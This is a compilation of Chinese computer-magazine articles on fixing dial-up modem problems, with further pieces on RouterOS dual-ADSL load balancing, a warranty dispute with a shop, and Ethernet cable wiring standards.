    若要更准确了解“猫”的工作情况，应单击【诊断】卡中的【详细信息】按钮，正常“猫”的“RD”、“SD”灯应该闪动。其中“RD”灯闪动，表示“猫”正在接收传来的数据，“SD”灯闪动，表示“猫”正在发送数据。如果两个灯中只有一个是亮的，则“猫”的COM口损坏的可能性较大。在此过程中，“TR”灯常亮，表示能够正常给出DTR信号，即终端机（电脑）已准备好。此灯在“猫”的电源打开时为先亮后灭。否则你的电脑在“猫”的驱动、IRQ设置等方面有问题，可重新安装驱动程序，检查有无IRQ冲突等。

    如何判断拨不出号的故障

    可按通常上网的方法拨号，此时外置“猫”的“RD”、“SD”灯应该闪动几下，否则说明电脑与“猫”的连接有问题。

    如果通往ISP的线路没有问题，接着能听到拨号音。如果你使用的是外置“猫”，还可看“CD”灯是否亮，该灯亮表示已经检测到线路载波，即ISP的线路是正常的。当你的“猫”检测到ISP的“猫”，就会发出“哗、哗”的“握手”声。若与上述现象不符，一是“猫”的设置可能有问题，如内置“猫”存在IRQ冲突，二是通往ISP的电话线路可能有故障，最好与附近的网友联系进行验证，然后寻求ISP的帮助。

    如何判断内置“猫”是否有故障

    内置“猫”没有外置的指示灯，除利用【诊断】选项卡进行判断外，还可使用以下方法：运行Win98【附件】中的【超级终端】。在【新建连接－超级终端】窗口（图3）内输入“at”回车，如果显示【OK】，说明“猫”能够与你的电脑通讯，没有故障。当然，此法也可检验RS－232电缆是否完好。

    我的“猫”为何老是断线

    如果你按11期《上网常见故障解疑》一文介绍的方法检查处理，仍然频繁断线，则可能是“猫”的两个内部设置参数中，DTR（终端机就绪延迟）信号由于线路干扰等原因无效和载波时间丢失响应时间不合适。这是由于DTR无效会让网络误认为你的电脑已经关闭，从而导致自动断线。DTR信号的取值范围为0～255/0.01秒（具体参看“猫”的说明书），不同“猫”的取值可能不同，采用Rockwell芯片的多为5（即0.05秒）。也就是说，DTR信号无效的时间超过0.05秒，“猫”就会断线。至于你的“猫”采用了多大的DTR信号值，可在图3窗口内输入“ats25?”回车，显示出来的数值就是DTR信号值，笔者的Rockwell芯片33.6K外置“猫”默认的DTR值为0.05秒。

    而载波时间丢失响应时间，是指载波丢失到你的“猫”断线中间的延迟时间。其取值范围为0～255/0.1秒，不同“猫”的取值一般不同，采用Rockwell芯片的多为14（即1.4秒）。若由于线路等各方面的原因，载波丢失时间超过了“猫”内部设置的1.4秒，你的“猫”就会认为是ISP主动中断了连接，从而断线。查询载波时间丢失响应时间的方法与上类似，在窗口（图3）内输入“ats10?” ，显示出来的数值乘以0.1秒就是载波时间丢失响应时间。

    如果你的“猫”经常断线，而查询得知的上述两值又比较小，说明你的“猫”“水土不服”，采用的默认设置不适合所使用的线路。比较彻底的解决办法是重新设置上述参数的默认值（它们保存在“猫”内，除使用“超级终端”进行点对点通讯外，一般情况下不好设置），以适应所使用的线路。若“猫”采用了Flash EPROM，则可以升级BIOS和驱动程序试一试。

    由于上面两种方法均不易实现，所以购“猫”前，最好深入了解你所在区域内各种“猫”的表现，找出不易断线同时速度又快的品牌。必要时还可与经销商达成协议：如果“猫”经常断线，就退货或换货。因为市场上的一些低价“猫”为尽可能降低成本，虽然采用的芯片不错，但电路板设计粗糙，且少了许多滤波元件，抗电磁干扰能力很差，极易断线。

    我和ISP的“猫”都是56K的“猫”，但连接的速率为何只有33.6K或更低

    除线路带宽影响外，首先要搞清楚你和ISP的“猫”使用的56K协议是否相同。由于历史的原因，早期的56K协议有Rockwell和Lucent提出的K56Flex和3COM提出的X2两个，两者互不兼容，后来才出现了统一的56K传输协议V.90。如果你使用的不是自动识别V.90（K56Flex）或V.90（X2）协议的双频“猫”，则可能需要手动设置跳线，指定“猫”使用何种协议，以便和ISP保持一致。如果你使用的是“升级猫”（由33.6K升级到56K的），则有可能存在兼容性问题。

    另外，你千万别说你用的是486（或早期奔腾）电脑＋56K外置“猫”。因为它们的串行口多采用16C550芯片，如果选择外置“猫”，则会因串口速度过低而无法发挥高速“猫”的性能。这时，你只能配优质的内置“猫”，因为它自带的串行口能满足高速传输的需要。要不干脆升级你的电脑算了。

    外置“猫”各个指示灯的意义

    CS灯亮表示CTS信号启动，准备接收数据。RS灯亮表示RTS信号启动，要求传送数据。CD灯亮表示已经检测到线路载波。OH灯亮表示“猫”已摘机，相当于我们打电话前拿起听筒。RD灯闪动表示“猫”正在接收服务器传来的数据。SD灯闪动表示“猫”正在发送数据到服务器。TR灯亮表示DTR信号启动，终端机（电脑）准备好，此灯在“猫”的电源打开时先亮后灭。MR（或MP即MODEM Power）灯亮表示“猫”的电源已接通。HS灯亮表示“猫”处于高速传输状态。AA灯亮表示处于自动应答状态。SQ灯亮表示线路不良。

    需要说明的是：不同品牌“猫”上的指示灯标识、数量多少不一，具体请看你的“猫”说明书，以上仅供参考。


内“猫”唤醒计算机

《一键清理系统垃圾》

内“猫”唤醒计算机

    本人最近配一台机器。主板是MS－6153VA Pro，考虑将来上“一线通”后，Modem要换为ISDN专用的内置“PC卡”，为节省费用，仍采用原来ISA总线的TW33888FastPnP数据/传真/语音Modem（33.6k）。
    机器各方面性能均令人满意，但调试时发现机器休眠后不能被Modem唤醒，而只能在关闭硬盘或关闭显示器时被Modem唤醒。查阅主板说明书得知，6153主板需要Modem提供一个五针插头及连线，以便连接到主板的JMDM1端子。而本人的“猫”可能过老不具备此连线。想起《电脑报》年初有文章介绍对硬件进行改动，但觉得从可靠性考虑，最好从软件方面着手，不到万不得已还是不动硬件。
    打开控制面板，在调制解调器属性一栏发现Modem端口是COM3，中断是10。再检查BIOS设置，发现Power Management Setup中，Modem Use IRQ一栏BIOS默认为3；而IRQ10（Reserved）一栏BIOS默认为“Secondary”。办法有了，分别将其改为10及“Primary”，同时将Resume By Ring设定为“Enabled”。保存CMOS后重启机器，通过不同方式让机器进入休眠模式，在电话铃响起时，机器立刻被唤醒，显示器点亮，“Receive Manager”菜单弹出。无论是接收传真还是语音电话自动录音，一切均正常。


小小数据线，也惹大麻烦

《一键清理系统垃圾》

小小数据线，也惹大麻烦

《中国电脑教育报》刘振业、张玉梅

    近日我为学校修理计算机，遇到了一例少见的故障，几经曲折，终于解决，现总结如下，以给各位朋友提供一点经验。

    故障现象：系统不认硬盘和光驱。这个问题是在笔者重新安装系统时出现的。笔者重新安装系统的方法是利用另外的一个硬盘A，将硬盘A上所有的系统源文件与软件复制到本地机硬盘的第一个分区（FAT32）中，复制完毕后将硬盘A卸下并恢复所有连接，出现故障：系统有时不认硬盘和光驱。刚开始考虑是接线错误，将所有的接线检查并确认无误后，故障依旧。于是利用排除法，将光驱的电源和数据线（本机硬盘和光驱各用一条数据线）卸下后，故障不再出现；仅连接光驱电源，也没有引发故障，这说明并不是电源负荷过高引起的；连接上光驱数据线后，故障又出现！更换一条数据线，故障解决。

    总结：相对于硬件故障来说，数据线引发的故障的确少见，但是从以上故障来看，数据线引发的故障不能忽视。笔者考虑数据线会出现问题的原因是组装计算机时，将非常宽的数据线随意捆绑，由于多次使用数据线，引起数据线里面的连接不稳定（偶尔开路），从而引发故障。建议对于宽的数据线要保持其平整，不能不经处理的随意绑定，这样容易引发数据线内部连接折断；如需绑定，应将宽数据线分离开来，使之成为小束的线，然后绑定。


驱动错误导致Modem罢工

《一键清理系统垃圾》

驱动错误导致Modem罢工

《中国电脑教育报》

    由于本人经济有限，家中还是用一台老古董电脑，上网是简单的拨号上网方式，配置为华硕P2V主板、赛扬333、华硕V3000 4MB显卡、实达SB5600 56k Modem、128MB内存。系统为Windows 98，由于系统本身的缘因，重装Windows 98是常做的一件事，没想到在前段时间，用系统恢复盘重装系统后，在装Modem驱动程序时，不小心装上了for Windows 2000的驱动程序，结果导致每次拨号上网的时候，总是提示没有找到Modem，删除原来的驱动程序，装回for Windows 98的驱动程序，结果问题依旧。(未装驱动程序时，开机能够检测到Modem，但上网时却提示没有找到Modem ) 开始以为是硬件设置上有问题，于是打开我的电脑属性中的设备管理器，硬件设备没有发现错误，可是电脑就是不认Modem。这个问题我以前一直没有遇到过，而且我装了几次系统都能顺利检测到Modem 。这时忽然想到Modem驱动光盘中附带有一个实达SuperStar软件，这是一个传真软件，它在运行之前会检测Modem，安装后，一样未检测到。这下可把我急坏了，因为我这段时间一直用它上网。一个月后不死心的我又打开我的电脑属性中的设备管理器，这次却有了新的发现：在“网络适配器”中有两项内容，一个是“Microsoft 虚拟专用网络适配器”，另一个为“拨号适配器”。不管它，先删了再说，删除后重安装Modem的驱动程序，然后在控制面板中双击“网络”，“配置”选项卡中选择“添加”按钮，选择添加协议，在安装的过程中自动安装适配器。一切就绪后，重启系统，然后驱“猫”上网，久违的拨号音终于又听到了，这样困扰我一个多月不能上网的问题终于解决了。看来这次的故障是出在“虚拟专用网络适配器”的身上，这次是由于我的疏忽才导致Modem出问题，所以在此我提醒大家在装驱动程序的时候千万不要装错了。


如何解决拨号后掉线的问题

《一键清理系统垃圾》

如何解决拨号后掉线的问题

    笔者前几天买了一部全向的56k外置调制解调器，此猫下载速度很快，也从不断线，使用起来感觉很不错,但是有一点美中不足就是有些时候明明已经拨通了ISP了，可就在检查用户名与密码时断线，在网络使用高峰期这种现象尤为突出,有时要重拨两三次才可以连通。这虽然不影响使用但总是感觉如鲠在喉。后来通过对软件的设置解决了问题，现把过程写出希望能对受同样问题困扰的用户有所帮助。
    第一步、删除掉不使用的协议。如果你使用单机来上网的话请把除TCP/IP协议之外的所有协议都删除掉,这样不但能提高机器启动的速度还可以提高拨号的成功率。方法是进入我的电脑→控制面板→网络，选中除TCP/IP协议之外的协议再单击删除就可以了。记住不要误删拨号网络适配器。
    第二步、对拨号使用的连接进行配置。方法是在我的电脑→拨号网络中选择所使用的连接，右键单击，再选属性，如果选中了“使用国家/地区代码和区号(S)”，请在“国家/地区代码（U）”中设置为“中国（86）”，设错的话根本无法拨号。接着选中服务器类型标签，在“高级选项”中把“登陆到网络”前的对号去掉,然后把“允许使用的网络协议”中NetBEUI(N)和IPX/SPX兼容(I)协议前的对号去掉，单击确定返回。
    第三步、修改注册表。方法是在运行框中键入regedit，单击确定打开注册表编辑器。依次打开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP，找到键名为NameSrvQueryTimeout的项。所谓NameSrvQueryTimeout就是域名服务器超时计数，如果在计数值的时间内没有收到域名服务器的回应，则当域名服务器没有收到本机的请求，请求将会重发或做超时错误处理，因此改大此值可以增加连接的成功率。该值Windows缺省为750毫秒，实在太吝啬了，在上网高峰期根本不够用，你可以把它调大到5000左右。具体情况各地不同，要自己多试几次，但最大不得超过65535。
    经过以上三步，你再拨号试试应该会有效果的，如果还是不行可能是TCP/IP协议本身出了问题，只好用最后一招了——重装TCP/IP协议，记住在重装之前一定要把旧的那一个删掉呦！最后愿大家上网更顺畅。


如何有效防止Modem掉线

《一键清理系统垃圾》

如何有效防止Modem掉线

     如今在网上冲浪，大多数人都使用Modem，因为从目前国内众多网民的消费水平来看，使用调制解调器上网还是比较现实的选择。既然用它上网，就免不了有掉线的问题，相信没有哪个网友敢说他（她）从没掉过线。Modem的掉线问题一直是困扰中国网民的一个阴影。用56K调制解调器上网是目前广大网民首选，但是，由于其稳定性的欠缺而造成的断线问题却带给你无尽的烦恼。因而，如何保证Modem的稳定性，更好地防止掉线是目前众多Modem厂家的首要课题。
首先我们来了解一下产生掉线问题的几种可能情况：
1.如果你的电话申请了“呼叫等待”这一程控电话新功能，每当有电话打进来，调制解调器就会受到干扰而断开。我就深受其害，经常在网上下棋下得兴起，突然一个并不重要的电话打过来，你不得被强行拉下网，等你再上去后，人家早溜了，可怜我辛苦挣来的积分啊！另外，如果一条电话线还接驳了传真机或其他外设，也会对通讯线路有影响。
2.数据终端就绪（DTR）信号的暂时无效也会引起掉线。当DTR信号持续空闲的时间超过Modem默认设置值时，就会引起掉线，这也是广大网友困惑不解或莫名其妙的掉线原因。
3.当你在阅读已下载完的网页或在网上没事干的时候，一般都会有一段不传送任何其他数据的时间，只是时间有长有短。此时系统会为你着想，即当线路空闲超过一定时间后，它就自动断开连接，以节约你的上网费用。
4.电话线路质量不好。这也是影响断线的主要因素之一，因为数据通信比话音通信对线路的要求要高得多，56K Modem的出现将电话线的数据传输能力发挥到了极限，因而偶尔掉线也就在所难免了。另外，户内电话线距离的增加和不正确的接线（一般是接两个或多个电话分机）也会影响线路质量，从而产生掉线。由于线路条件的改善不是一朝一夕所能完成的，因而这一问题还将维持较长一段时间。
5.如果Modem无法正确区分到底是远端Modem的真正断线，还是由意外的线路干扰引起的暂时性载波丢失情况，也会引起掉线。
6.黑客。现在有一种黑客软件，叫Kmodem，专门用来使他人的Modem掉线。在你和别人聊天时，要小心保护你的机器。
7.另外，Modem本身的质量以及不同Modem间的兼容性问题也是引起Modem掉线的一个普遍原因。
针对以上引起Modem掉线的几种原因，接下来让我们看看如何防止掉线的方法：因为现在几乎所有的Modem厂商均已对产品作了优化处理，即Modem会根据实际的线路状况适当降低与远端Modem的连接率，所以，对于电话线质量不好的用户而言可以省却不少麻烦；对于呼叫等待或是网络空闲原因引起的掉线，计算机用户可以较为简单地通过改变系统中的相应设置来避免；而对于DTR和线路干扰引起的掉线，虽说可使用AT指令在超级终端中改变适当设置以缓解掉线问题，但终究技术性较高，对于普通用户掌握起来有一定的困难，因此解决由这两种原因所引起的掉线问题也便成了各大Modem厂商研究的焦点，只有通过硬件设计上的改进、创新来解决这一问题，而对于Modem本身的原因，即Modem的产品质量和兼容性问题则完全取决于Modem生产厂家的技术。要避免这一因素引起的掉线，就要注意购买Modem时要注重优良品质以及良好的升级性。
目前很多厂商都已开始在防掉线技术上做文章。比如联想的射雕系列产品具有连接稳定、高速传输、语音服务等优势,针对中国电话线路特点，专门增加防掉线设计，自始至终保障你的网路畅通无阻。
以上就Modem掉线问题发表一些个人观点和建议。在多数情况下，电脑用户对其稳定性的关心甚至超过了对计算机速度的关心程度。在这样一重情况下，作为上网最常用的工具——Modem的稳定性也就越来越为人们所重视。因此购买一个优质的“猫”在目前看来还是比较实际的选择，等到ISDN或是DDN全面普及时，本文也就成了“鸡肋”了。

作者：沈溯
来源：大众软件


实达路由器连起电信财务广域网

《一键清理系统垃圾》

实达路由器连起电信财务广域网

    随着中国信息产业的飞速发展，经济改革的不断深入，各企业都开始加紧自身的网络化建设。其中,财务部门作为掌握企业物流、资金流等重要信息的机构对信息化的要求更加迫切，其职能也由原先的清对核算转变为对企业资源的管理、为企业决策提供依据等。因此，大多数企业建网时都是以财务系统为核心进行组建和规划。

    海南某电信企业，需要构建以其海口市总部为核心、遍布全省20个县市的财务骨干网，以此来实现自身财务系统的信息化和规范化，从而达到对各项资源的合理配给和应用。该项目采用了实达STAR-R2501路由器来构建其财务骨干网的主体部分。

    ■ 需求分析

    1.该财务系统原采用Modem上网方式，但日益增加的业务工作使得原有的线路不能满足负荷大数据量的要求，其低速率的传输既影响了工作效率,又给整个财务体系的稳定运作带来障碍;

    2.该广域网使用帧中继线路实现骨干联接，选用的结点路由器需满足支持多接口和多协议的要求;

    3.财务网的整体框架采用星型结构，主端口选择128kbpsPVC（永久虚电路），可扩充至2Mbps，子端口采用64kbpsPVC，规划出由20个县市局域网组成的财务系统网络结构;

    4.骨干网路由器应具备先进的管理功能和防护功能，保证数据传输的安全性和稳定性，从而为下一步企业财务核算管理、动态分析等全方位的网络应用打下基础。

    ■设备配置及网络特点

    该财务网由于采用实达STAR-R2501作为其骨干路由器，因此具有如下几个特点：

    1. 支持多种接口

    R2501可使用DDN、租用线路或拨号线与远端网络连接，使用以太网接口RJ45、AUI与内部以太网连接；作为多协议串口的广域网接口，可以连接DTE或DCE接口，支持同步传输，最高速率2.048Mbps；备份口和控制台采用RS-232C，支持AT命令；备份口可配置成拨号口作为广域网接口的备份链路，也可以单独使用。 　　2. 支持网络协议

    在广域网协议方面，R2501支持PPP协议，协议可以捆绑PAP和CHAP安全验证，同时，支持SLIP、CSLIP、X.25协议；在拨号协议方面，R2501支持AT命令，通过Modem、ISDN设备进行拨号连接；以太网接口支持Ethernet_II，可以使用RJ45或AUI连接到局域网，速率为10Mbps。

    3. TCP/IP性能

    R2501可以采用静态路由，提供高速的路由寻址方式；支持RIP2动态路由，可以自动更新路由表，在网络结构变化时，无需人员干预即可自动调整路由；同时,R2501还支持拨号路由，使用Modem、ISDN连接互联网；R2501还支持Van Jacobson TCP头压缩、多会话Telnet、Ping测试等TCP功能。

    4.先进的管理性能

    R2501支持世界标准网管SNMP；其配置命令分级保护，确保未授权用户无法侵入路由器；可以通过Modem远程拨入进行配置;R2501还支持防火墙功能，可以对数据进行包过滤。

    ■ 系统运行现状

    在网络系统开通运行的半年时间里，该网络及系统稳定运行，安全实时地传输用户数据,从未发生因为路由器或网络设计链路等造成的网络中断、数据丢失错乱等现象。其稳定的性能和强大的功能得到该电信企业的一致认同。

返回


双ADSL负载均衡(ROS)

《一键清理系统垃圾》

双ADSL负载均衡(ROS)

1。用光盘版全选安装 （软盘版要另外下插件）
注意注册码都用大写
先插上一块网卡以便定下他作为连接内网的网卡
2。使用 admin用户登陆， 密码为空
3。设置第一块网卡的ip
输入setup，提示你设置ether1（第一块网卡连接内网），输入ip地址（192.168.0.1）子网掩码(255.255.255.0) gateway：192.168.0.254一路回车即可。
4。将剩下二块网卡插入电脑
5。在windows机器上，ip设成192.168.0.x ，在 ie 地址栏输上 192.168.0.1
出现 routeos 的欢迎画面。点击，提示下载 winbox ，保存
6。运行 winbox 输上 192.168.0.1 用户名 admin 密码为空，选连接。会出现路由的管理界面
7。激活新插入的二块网卡：点 inte***ce ，点第二块卡，选勾，启用前面由x变为R
8。设置外网的二块网卡地址，在winbox选ip->dhcp-client 在窗口中勾上enabled inte***ce选ether2（第二块网卡）勾上add default route 选hostname并添上wan1 表示第一块外网网卡，然后apply 这时如果拿到ip就会在ip->address里看到ip了
现在设置第三块网卡，现在有问题了routeros只能添加一个dhcp客户，所以如果再按上面的方法获得ip那么前面的到的ip就没有了，所以这里只能将就一下了，因为有限通ip一般只要连接就不会变ip所以就把还有一根线上的ip作为静态ip看，先记下ip然后在ip->address里按加号填入ip如219.233.23.23/24,在这里要注意：其实都是固定ip的话就在这设置即可，但如果你的二个ip在同一网段中如一个是219.233.23.23另一个是219.233.23.147的话就要在/后就是掩码这部分分一下
如219.233.23.23/25 219.233.23.147/24 这样在后面负载均衡时就不会出错了
9。现在你应该能ping通外网了，不过防火墙还没设置，在ip->firewall里选source nat 按加号添加规则，在规则里选action ->action里选masquerade
现在就能局域网里就能上网了。
10。现在来设负载均衡
在控制台里输入
ip route add gat=外网地址1,外网地址2
即可
是不是很简单啊
11。端口映射
端口映射很容易
在控制台里
ip firewall dst-nat> add action=nat protocol=tcp
^
这是协议可以选all
dst-address=外网地址/32:80 to-dst-address=内网ip地址
^
这里是你要映射的端口，如果全部就不要添

例子1：将外网所有80端口的请求都指向到168上
ip firewall dst-nat> add action=nat protocol=tcp
dst-address=319.23.23.23/32:80 to-dst-address=192.168.0.168
例子2：完全开放192.168.0.168
ip firewall dst-nat> add action=nat protocol=tcp
dst-address=319.23.23.23/32 to-dst-address=192.168.0.168
12.来看看routeros的防火墙吧，功能不错哦
比如现在流行的震荡波和冲击波的端口134－139
在winbox中
ip->firewall->filter rules 先设input(在右边可选的)
选加
general
protocl选udp或tcp（其实这二个都要设，只要重复作就好了）
src.port勾上填入134－139
dst.port勾上填入134－139
action
在action里选drop丢弃包或reject拒绝包
ok完成
再选forward和output照上面设完，这样不论是外网的机器或内网的机器中毒都不会影响其他用户了。
其实ip filter rules可设很多规则可以作一个非常不错的防火墙不过要注意input，forward，output根据不同情况的设置


死“猫”复活记

《一键清理系统垃圾》

死“猫”复活记

    不久前我在电子市场买回台湾产“云舟”外“猫”一只，当使用半年多以后就开始出现故障，故障现象是不能连上电话线拨号。每次连接的时候电脑总是报告“请你检查电话线是否正确的连接”，而经过我仔细地检查电话线，没有发现不正常现象。
    开始我怀疑计算机的端口有故障，经过换Modem进行测试，证明机器的端口没有问题。那看来故障就在“猫”的身上了。
    首先，跟据我日常维修的经验，电路中的集成电路一般不容易损坏，所以我把精力放在了电路的一些独立的电子元件上，因为它们的功率一般较大，也容易测量。经反复的试验，我发现以前在拨号的时候，Modem总是在拨号的同时发出一声轻微的“咔嗒”声，但在损坏后拨号的时候就没有了这种声音。根据判断，这可能是Modem里面的微型继电器没有工作造成的。这个微型继电器在电路中的作用就是接通或断开外部的电话线路，是不是继电器损坏使拨号的时候电话线不能正确地连接呢？根据线路板上的图标，我找到了继电器的线圈接头，用一个1.5伏的外接电源接到线圈的两端，继电器动作，测量其常开/常闭触点一切正常，看来继电器本身没有故障。因为在拨号的时候就是靠继电器常开触点接通电话线路的，所以我用两根导线分别将继电器两个常开触点短接，然后在很短的时间里接上电话线进行拨号，（如果在接上线后很长的时间里拨号，电话线路会由于话机长时间地挂起，出现忙音而不能进行正常地拨号）这时拨号连接一切正常，所以我断定一定是由于继电器不能正常地动作而使电话线路不能正确地连接。一般在电子电路中继电器是靠三极管的饱和和截止控制它的吸合或断开。当三极管饱和时继电器线圈得电吸合，常开触点闭合导通。当三极管截止时继电器线圈失电，常开触点断开。根据这个原理我按照电路上的连线找到了接在继电器线圈上的贴片三极管，经测量三极管的集电极和基极短路，造成三极管在拨号的时候发射极和集电极不能够饱和导通，所以继电器不能工作。此管为PNP型管，换同类型的普通三极管，故障排除，至此我的小“猫”又复活了。
    这类故障一般在Modem自检时表现为一切正常，但是在进行正常拨号时就反映出好像电话线不通的样子，所以在检修时应首先判断电话线路是否正常，如果线路正常才对Modem加以故障分析。


痛苦的Modem维修记

《一键清理系统垃圾》

痛苦的Modem维修记

《中国电脑教育报》宁有文

    与商家交涉——怒

    笔者的电脑故障表现为不能上网了。经过初步检查和仔细的测试，笔者认定不能上网的原因是Modem芯片发生故障导致的。取出Modem，发现Modem背部的PCB板上贴着“J”和“CC”（以后简称“J”和“C”）的“标签”，从“标签”上得知该配件的质保期限是2002年10月30日。回头一看日历，今天已经是10月18日。看来留给笔者的时间不多，于是，笔者赶紧来到电脑城找到了当初直接卖出Modem的商家（标签为“J”）。

    “J”商家在本地是DIY方面的知名商家，笔者很快和负责售后的商家人员取得联系。售后部门的一位技术员对Modem进行了一系列检查，最后认定Modem发生了硬件故障。接下来，笔者如读者们所想，应该是商家很快给笔者更换Modem的时候了。然而，由于“J”商家是在另外一个商家——“C”商家调的货。因此，“J”商家的人员告诉笔者必须把Modem送到“C”商家去检查，而后再由“C”商家的人给笔者更换Modem。

    于是，由笔者和“J”商家派出的人员一起来到了位于重庆赛博二楼的“C”门市。经过“J”商家派出人员的说明后，“C”商家的店员头一句话就是告诉笔者同型号的Modem没有货，看到笔者一脸的茫然和不信任表情，“C”商家建议开具收条，待“货”到来后再通知笔者领取。笔者理所当然拒绝，原因有三：一是该Modem故障为芯片坏，这种故障的解决非常麻烦，对消费者来说，只有尽快更换Modem，否则，商家一旦拖过质保，就没有责任了；二是笔者由于工作的关系，急需使用Modem上网和外界取得数据联系；三是笔者在电脑城之行前曾打电话询问过“C”商家有笔者同型号的Modem，答案为肯定。

    如此，场面有点僵，“J”商家派出的工作人员帮笔者和“C”商家进行善意沟通，可“C”商家仍坚持无货，并反复说明肯定没有货，所以不能给予马上更换，坚持要求开单然后再通知笔者。时间就这样的耗费了半个小时。于是，笔者提醒先由“C”商家的技术员对Modem进行检测。在检测的过程中，笔者和技术员套近乎，再次确认该商家确实有同型Moden。然而，刚才接待笔者的工作人员马上走出来否认了这一说法。之后，“J”的人员在费力调停无果后，很遗憾地告诉笔者她将要离去，剩下笔者一人……

    经“C”商家人员的检查，也终于确认是该Modem坏，但“C”商家坚持要开单收Modem，改天（未承诺为哪天）待货物“来”后再通知笔者换货。笔者站在消费者的立场，坚决地据理力争。2小时后，“C”商家看到笔者有碍其做生意之嫌，以及对和笔者沟通的厌烦，终于很不情愿地从柜台底部拿出一块其他型号的Modem换给了笔者，并在笔者要求下贴了标。但当笔者询问如果这块Modem在质保期内再坏又当如何时，“C”商家再次保持了沉默。

    经过电脑城中近三个小时的无谓逗留后，笔者赶回家中按照要求安装好Modem，经多次调试（换插槽，换驱动，换系统，换主板）后电脑根本检测不到该Modem，笔者才知道肯定被“C”商家耍了！

    与厂方交涉——迷茫

    第二天一早，没合上眼的笔者打算再次请假专程去找C商家要个说法。在电脑城门口，碰到一位以前在电脑城共事的朋友，向他诉说了这事。朋友听后，一脸的表示理解和无可奈何，并告诉笔者找商家是没有多大用的。商家只会拖，尤其是那种小的商家，这样倒不如找厂家好了。

    笔者想了想，自己毕竟是一名交了款都快一年的孙子消费者，只好取消了再去找说法的念头，并由此踏上了寻访厂家之路。很快，在厂商办事处里，笔者气愤地向工作人员说明了来由，工作人员拿过Modem经过简单目测和询问后，就给笔者更换了一只返修的Modem，“要是这返修的又坏了怎么办？”笔者不放心地问道。“再拿来就是，三年质保”工作人员答。“三年？那为什么商家一直标称一年呢？而且是一年换返修过的Modem？”该工作人员听后笑而不语。看来，这其中的玄机是笔者这等人所不能领会的了。

    笔者的感叹

    这次事件基本上就此结束。但给笔者带来的冲击却是巨大的，作为一名普通的消费者，作为一名发烧的DIYer，对于商家这种对配件发生问题就互相推脱，互相逃避责任，而把理应作为上帝的消费者当成足球这样踢来踢去的市场行为，笔者在异常愤慨之余，惟有一声叹息。

    而站在此次事件中的“J”商家和“C”商家如何评价呢，按照常理来说，“C”商家无疑是不法商人，而“J”商家倒基本尽到了一个DIY商家所承诺的售后的基本职责。但是，从商家的角度来说，这也不能全部怪商家。由于商家和厂家所存在的错综复杂的渠道代理关系，这就无疑为商家找厂家更换产品增加的成本和工作压力；再看厂家，近年来竞争对手的增多，国内众厂家的价格战纷纷削弱了大家的利润点，这样，恶性竞争带来的只能是售后服务的缩水和对消费者权益的损害。在此，笔者倒真希望通过媒体来呼吁一下广大的消费者和厂商们，再靠打价格战捞市场的同时，能不能眼光放长远点，在品牌和服务上多下点功夫，从源头解决兼容机售后的问题呢？


网络中各种网线的接线的方法

《一键清理系统垃圾》

网络中各种网线的接线的方法

      作者： 　来源于： 　发布时间：2005-11-1 11:23:13
      在网络组建过程中，双绞线的接线质量会影响网络的整体性能。双绞线在各种设备之间的接法也非常有讲究，应按规范连接。本文主要介绍双绞线的标准接法及其与各种设备的连接方法，目的是使大家掌握规律，提高工作效率，保证网络正常运行。

       双绞线的标准接法

      双绞线一般用于星型网络的布线，每条双绞线通过两端安装的RJ-45连接器（俗称水晶头）将各种网络设备连接起来。双绞线的标准接法不是随便规定的，目的是保证线缆接头布局的对称性，这样就可以使接头内线缆之间的干扰相互抵消。

      超五类线是网络布线最常用的网线，分屏蔽和非屏蔽两种。如果是室外使用，屏蔽线要好些，在室内一般用非屏蔽五类线就够了，而由于不带屏蔽层，线缆会相对柔软些，但其连接方法都是一样的。一般的超五类线里都有四对绞在一起的细线，并用不同的颜色标明。
       双绞线有两种接法：EIA/TIA 568B标准和EIA/TIA 568A标准。具体接法如下：
       T568A线序
        1　　2　　3　　4　　5　　6　　7　　8
       绿白 绿 橙白 蓝 蓝白 橙 棕白 棕
       T568B线序
        1　　2　　3　　4　　5　　6　　7　　8
       橙白 橙 绿白 蓝 蓝白 绿 棕白 棕

       直通线：两头都按T568B线序标准连接。
       交叉线：一头按T568A线序连接，一头按T568B线序连接。

      我们平时制作网线时，如果不按标准连接，虽然有时线路也能接通，但是线路内部各线对之间的干扰不能有效消除，从而导致信号传送出错率升高，最终影响网络整体性能。只有按规范标准建设，才能保证网络的正常运行，也会给后期的维护工作带来便利。

       设备之间的连接方法
       1． 网卡与网卡
       10M、100M网卡之间直接连接时，可以不用Hub，应采用交叉线接法。
       2．网卡与光收发模块

      将网卡装在计算机上，做好设置；给收发器接上电源，严格按照说明书的要求操作；用双绞线把计算机和收发器连接起来，双绞线应为交叉线接法；用光跳线把两个收发器连接起来，如收发器为单模，跳线也应用单模的。光跳线连接时，一端接RX，另一端接TX，如此交叉连接。不过现在很多光模块都有调控功能，交叉线和直通线都可以用。光纤收发器基本网络连接图所示。
       3．光收发模块与交换机
       用双绞线把计算机和收发器连接起来，双绞线为直通线接法。
       4．网卡与交换机
       双绞线为直通线接法。
       5．集线器与集线器（交换机与交换机）

      两台集线器（或交换机）通过双绞线级联，双绞线接头中线对的分布与连接网卡和集线器时有所不同，必须要用交叉线。这种情况适用于那些没有标明专用级联端口的集线器之间的连接，而许多集线器为了方便用户，提供了一个专门用来串接到另一台集线器的端口，在对此类集线器进行级联时，双绞线均应为直通线接法。

       用户如何判断自己的集线器（或交换机）是否需要交叉线连接呢？主要方法有以下几种：
       查看说明书
       如果该集线器在级联时需要交叉线连接，一般会在设备说明书中进行说明。
       查看连接端口
       如果该集线器在级联时不需要交叉线，大多数情况下都会提供一至两个专用的互连端口，并有相应标注，如“Uplink”、“MDI”、“Out to
      Hub”，表示使用直通线连接。
       实测

      这是最管用的一种方法。可以先制作两条用于测试的双绞线，其中一条是直通线，另一条是交叉线。之后，用其中的一条连接两个集线器，这时注意观察连接端口对应的指示灯，如果指示灯亮表示连接正常，否则换另一条双绞线进行测试。

       6．交换机与集线器之间
       交换机与集线器之间也可通过级联的方式进行连接。级联通常是解决不同品牌的交换机之间以及交换机与集线器之间连接的有效手段。

      对于扩充端口的数量还有另一种方式是堆叠。堆叠是扩展端口最快捷、最便利的方式，但不是所有的交换机都支持堆叠。堆叠通常需要使用专用的堆叠电缆，还需要专门的堆叠模块。另外，同一组堆叠交换机必须是同一品牌，并且在物理连接完毕之后，还要对交换机进行设置，才能正常运行。对于堆叠的接法，这里不再深究，有兴趣的读者可进一步查阅相关资料.

      [本日：32 本周：1217 本月：1217 总浏览数：1217 ] [返回上一页] [告诉好友] [网友评论] [打 印] [ 字体：大 中 小
]
